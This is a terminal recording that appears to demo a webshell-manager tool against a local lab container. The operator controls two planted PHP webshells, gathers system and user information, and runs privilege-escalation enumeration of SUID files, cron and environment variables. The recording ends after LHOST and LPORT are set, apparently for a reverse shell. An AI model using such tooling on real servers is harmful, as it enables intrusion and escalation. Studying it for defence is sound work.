{"version": 2, "width": 104, "height": 32, "timestamp": 1782522518, "env": {"TERM": "xterm-256color", "SHELL": "/bin/bash"}}
[0.1728, "o", "\u001b[95m[+] Checking POST http://127.0.0.1:8080/index.php (password='c') ...\u001b[0m\r\n"]
[0.1771, "o", "\u001b[1;32m[+] Webshell is alive.\u001b[0m\r\n"]
[0.1773, "o", "\u001b[95m[+] Checking POST http://127.0.0.1:8080/c2.php (password='c') ...\u001b[0m\r\n"]
[0.1812, "o", "\u001b[1;32m[+] Webshell is alive.\u001b[0m\r\n"]
[0.1812, "o", "\u001b[1;32m[+] 2 webshell(s) online. Entering interactive mode.\u001b[0m\r\n"]
[0.1876, "o", "\u001b[?12l\u001b[?25h"]
[0.1912, "o", "\r\n===================================================\r\n           ____        _\r\n          / ___| _ __ (_)_ __   ___ _ __\r\n          \\___ \\| '_ \\| | '_ \\ / _ \\ '__|\r\n           ___) | | | | | |_) |  __/ |\r\n          |____/|_| |_|_| .__/ \\___|_|\r\n                      |_|\r\n===================================================\r\n|      WebShell Manager Via Terminal (v2.0.0)     |\r\n|  https://github.com/WangYihang/Webshell-Sniper  |\r\n===================================================\r\n\r\n"]
[0.1948, "o", "\u001b[6n"]
[0.1963, "o", "\u001b[?2004h\u001b[?1l\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ >\u001b[16D\u001b[17C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[0.1987, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.2085, "o", "\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\u001b[1;38;5;231;48;5;25m  \u25b6  Sessions & recon \u2014 manage many shells, one active  \u001b[0m\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\r\n"]
[5.0154, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.0771, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.1386, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.2001, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.2617, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.3233, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.3851, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.4469, "o", "\u001b[?25l\u001b[?7l\u001b[7D\u001b[0;32msessions\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.5088, "o", "\u001b[?25l\u001b[?7l\u001b[25D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ > \u001b[0;32msessions\u001b[25D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.5088, "o", "\u001b[?2004l"]
[5.5127, "o", "\u250f\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36m \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mid\u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mmethod\u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36murl                            \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 * \u2502 0  \u2502 POST   \u2502 http://127.0.0.1:8080/index.php \u2502\r\n\u2502   \u2502 1  \u2502 POST   \u2502 http://127.0.0.1:8080/c2.php    \u2502\r\n\u2514\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[5.5132, "o", "\u001b[6n"]
[5.5139, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ >\u001b[16D\u001b[17C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.5146, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.5228, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102messions\u001b[7D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.5845, "o", "\u001b[?25l\u001b[?7l\u001b[0my\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.6459, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.7073, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.7689, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.8306, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.8923, "o", "\u001b[?25l\u001b[?7l\u001b[6D\u001b[0;36msysinfo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.9539, "o", "\u001b[?25l\u001b[?7l\u001b[24D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ > \u001b[0;36msysinfo\u001b[24D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[7.9552, "o", "\u001b[1;32m[+] ========================================\u001b[0m\r\n"]
[7.9554, "o", "\u001b[1;32m[+] URL           : http://127.0.0.1:8080/index.php\u001b[0m\r\n\u001b[1;32m[+] Method        : POST\u001b[0m\r\n"]
[7.9581, "o", "\u001b[1;32m[+] Document root : /var/www/html\u001b[0m\r\n"]
[7.9593, "o", "\u001b[1;32m[+] PHP version   : 8.3.31\u001b[0m\r\n"]
[7.9728, "o", "\u001b[1;32m[+] Kernel        : Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 \u001b[0m\r\n\u001b[1;32m19:26:24 UTC 2026 x86_64 GNU/Linux\u001b[0m\r\n"]
[7.9735, "o", "\u001b[6n"]
[7.9742, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ >\u001b[16D\u001b[17C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.9749, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.9629, "o", "\u001b[?25l\u001b[?7l\u001b[0mg\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.0244, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.086, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.1476, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.209, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.2706, "o", "\u001b[?25l\u001b[?7l\u001b[5D\u001b[0;36mgetuid\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.3324, "o", "\u001b[?25l\u001b[?7l\u001b[23D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ > \u001b[0;36mgetuid\u001b[23D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[10.333, "o", "\u001b[95m[+] [exec] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[10.3441, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n"]
[10.3446, "o", "\u001b[6n"]
[10.3451, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ >\u001b[16D\u001b[17C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.3459, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.9326, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.9942, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;32mcd\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.0558, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.1178, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.1794, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.2411, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.3027, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.3642, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.4259, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.4882, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.5504, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.6127, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.6744, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.736, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.7977, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.8594, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.9214, "o", "\u001b[?25l\u001b[?7l\u001b[33D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ > \u001b[0;32mcd\u001b[0m \u001b[0;33m/var/www/html\u001b[33D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[12.9239, "o", "\u001b[1;32m[+] cwd: /var/www/html\u001b[0m\r\n"]
[12.9246, "o", "\u001b[6n"]
[12.9253, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.9261, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.3337, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.3954, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.4569, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.5187, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.5806, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.6424, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.7041, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.7657, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.8272, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.8888, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.9503, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.012, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.0738, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.1353, "o", "\u001b[?25l\u001b[?7l\u001b[42D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mrecon\u001b[0m \u001b[0;33mprivesc\u001b[42D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[15.136, "o", "\u001b[95m[+] [enum] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[15.5118, "o", "\u001b[1;32m[+] == whoami ==\u001b[0m\r\n"]
[15.5119, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n"]
[15.512, "o", "\u001b[1;32m[+] == sudo ==\u001b[0m\r\n"]
[15.512, "o", "sh: 1: sudo: not found\r\n"]
[15.5121, "o", "\u001b[1;32m[+] == kernel ==\u001b[0m\r\n"]
[15.5122, "o", "Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 19:26:24 UTC 2026 x86_64\r\nGNU/Linux\r\n"]
[15.5123, "o", "\u001b[1;32m[+] == cron ==\u001b[0m\r\n"]
[15.5124, "o", "total 20\r\ndrwxr-xr-x 1 root root 4096 Jun 11 00:28 .\r\ndrwxr-xr-x 1 root root 4096 Jun 23 10:35 ..\r\n-rwxr-xr-x 1 root root  539 Jan 27 22:53 apache2\r\n-rwxr-xr-x 1 root root 1478 Jun 24  2025 apt-compat\r\n-rwxr-xr-x 1 root root  123 Dec 16  2025 dpkg\r\n"]
[15.5125, "o", "\u001b[1;32m[+] == capabilities ==\u001b[0m\r\n"]
[15.5126, "o", "sh: 1: getcap: not found\r\n\u001b[1;32m[+] == suid ==\u001b[0m\r\n"]
[15.5128, "o", "/usr/bin/chsh\r\n/usr/bin/newgrp\r\n/usr/bin/mount\r\n/usr/bin/umount\r\n/usr/bin/gpasswd\r\n/usr/bin/passwd\r\n/usr/bin/chfn\r\n/usr/bin/su\r\nfind: '/var/cache/apt/archives/partial': Permission denied\r\nfind: '/var/cache/ldconfig': Permission denied\r\nfind: '/etc/ssl/private': Permission denied\r\nfind: '/root': Permission denied\r\n"]
[15.5129, "o", "\u001b[1;32m[+] == listening ==\u001b[0m\r\n"]
[15.5129, "o", "sh: 1: netstat: not found\r\n"]
[15.513, "o", "\u001b[1;32m[+] == env ==\u001b[0m\r\n"]
[15.5135, "o", "APACHE_CONFDIR=/etc/apache2\r\nHOSTNAME=5dd92056d40a\r\nPHP_INI_DIR=/usr/local/etc/php\r\nSHLVL=0\r\nPHP_LDFLAGS=-Wl,-O1 -pie\r\nAPACHE_RUN_DIR=/var/run/apache2\r\nPHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64\r\nPHP_VERSION=8.3.31\r\nAPACHE_PID_FILE=/var/run/apache2/apache2.pid\r\nGPG_KEYS=1198C0117593497A5EC5C199286AF1F9897469DC C28D937575603EB4ABB725861C0779DC5C0A9DE4 \r\nAFD8691FDAEDF03BDF6E460563F15A9B715376CA\r\nPHP_ASC_URL=https://www.php.net/distributions/php-8.3.31.tar.xz.asc\r\n"]
[15.5135, "o", "PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64\r\nPHP_URL=https://www.php.net/distributions/php-8.3.31.tar.xz\r\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\r\nAPACHE_LOCK_DIR=/var/lock/apache2\r\nLANG=C\r\nAPACHE_RUN_GROUP=www-data\r\nAPACHE_RUN_USER=www-data\r\nAPACHE_LOG_DIR=/var/log/apache2\r\nPWD=/var/www/html\r\nPHPIZE_DEPS=autoconf            dpkg-dev                file            g++             gcc             \r\nlibc-dev                make            pkg-config              re2c\r\nPHP_SHA256=66410cee07f4b2baeb0843140bb2a2b52ef930b5cf9b3d6e6d158b33aae8fa37\r\nAPACHE_ENVVARS=/etc/apache2/envvars\r\n"]
[15.5144, "o", "\u001b[6n"]
[15.5154, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.5166, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.3445, "o", "\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\u001b[1;38;5;231;48;5;25m  \u25b6  Datastore \u2014 set once, reused as defaults (no more prompts)  \u001b[0m\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\r\n"]
[19.153, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102mysinfo\u001b[6D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.2154, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[C\u001b[0;38;2;102;102;102msions\u001b[6D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.277, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.3386, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.4004, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mL\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.4628, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mH\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.5251, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mO\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.5877, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.6505, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mT\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.7129, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.7748, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.8364, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m7\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.8982, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m2\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.9599, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.0216, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.0834, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m6\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.1453, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.2071, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.269, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.3313, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.393, "o", "\u001b[?25l\u001b[?7l\u001b[49D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mLHOST\u001b[0m \u001b[0;33m172.16.1.1\u001b[49D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[20.3937, "o", "\u001b[1;32m[+] LHOST => 172.16.1.1\u001b[0m\r\n"]
[20.3942, "o", "\u001b[6n"]
[20.3949, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.3956, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.0998, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met LHOST 172.16.1.1\u001b[19D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.1614, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.223, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.2854, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.3476, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mL\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.41, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mP\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.4721, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mO\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.534, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mR\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.5955, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mT\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.6569, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.7184, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.7798, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.8414, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.9031, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.9646, "o", "\u001b[?25l\u001b[?7l\u001b[43D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mLPORT\u001b[0m \u001b[0;33m4444\u001b[43D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.9646, "o", "\u001b[?2004l"]
[21.9653, "o", "\u001b[1;32m[+] LPORT => 4444\u001b[0m\r\n"]
[21.9658, "o", "\u001b[6n"]
[21.9665, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.9672, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
